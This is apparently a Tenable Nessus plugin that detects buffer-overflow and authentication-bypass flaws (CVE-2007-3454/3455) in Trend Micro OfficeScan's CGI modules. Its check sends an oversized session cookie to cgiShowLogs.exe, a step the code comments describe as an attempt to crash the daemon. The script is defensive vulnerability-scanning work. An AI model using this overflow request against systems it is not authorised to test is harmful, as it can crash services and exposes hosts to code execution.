#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(25625);
  script_version("$Revision: 1.7 $");

  script_cve_id("CVE-2007-3454", "CVE-2007-3455");
  script_bugtraq_id(24641, 24935);

  script_name(english:"Trend Micro OfficeScan Server CGI Modules Multiple Vulnerabilities");
  script_summary(english:"Checks version number");

  desc = "
Synopsis :

The remote web server is affected by multiple vulnerabilities. 

Description :

The remote host appears to be running Trend Micro OfficeScan Server or
Client Server Messaging Security for SMB.

The version of OfficeScan Server or Client Server Messaging Security
for SMB installed on the remote host reportedly contains a buffer
overflow issue that could allow a remote attacker to execute arbitrary
code with the privileges of the web server user id, by default
'SYSTEM'. 

It may also allow an attacker to bypass authentication with
specially-crafted HTTP headers and gain access to the application's
Management Console. 

See also :

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=558
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=559
http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0318.html
http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0319.html
http://www.nessus.org/u?d24cbf16
http://www.nessus.org/u?60b18f77
http://www.nessus.org/u?0ed245af
http://www.nessus.org/u?f42dc93d
http://www.nessus.org/u?fae5a0b1
http://www.nessus.org/u?0ba8ef70
http://www.nessus.org/u?b4cac3f5
http://www.nessus.org/u?976d28fa

Solution :

Apply the appropriate security patch as per the vendor advisories
referenced above. 

Risk factor : 

Critical / CVSS Base Score : 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 4343, 8080);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:8080);
if (!get_port_state(port)) exit(0);


cookie = string(
  "testCookie=Test; " ,
  "session=" + crap(data:"1", length:0xe0) + "; " ,
  "key=; ",
  "stamp="
);
data = "";


# Make sure OfficeScan is installed.
req = http_get(item:"/officescan/", port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# If so...
if ("cgiChkMasterPwd.exe" >< res && 'content="0;URL=' >< res)
{
  url = strstr(res, 'content="0;URL=') - 'content="0;URL=';
  if (url) url = url - strstr(url, "cgiChkMasterPwd.exe") + "cgiShowLogs.exe";

  if (url)
  {
    # Make sure the affected script exists.
    req = http_get(item:url, port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # If it does...
    if ('document.cookie="retry=0;path=/officescan";' >< res)
    {
      # Try to crash the daemon.
      req = string(
        "POST ", url, " HTTP/1.1\r\n", 
        "Host: ", get_host_name(), ":", port, "\r\n", 
        "Cookie: ", cookie, "\r\n",
        "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
        "Content-Type: application/x-www-form-urlencoded\r\n", 
        "Content-Length: ", strlen(data), "\r\n",
        "\r\n", 
        data
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
      if (res == NULL) exit(0);

      # There's a problem if we don't see our session cookie.
      if ("HTTP/" >< res && !egrep(pattern:"Set-Cookie: +session=1+;", string:res))
      {
        security_hole(port);
        exit(0);
      }
    }
  }
}
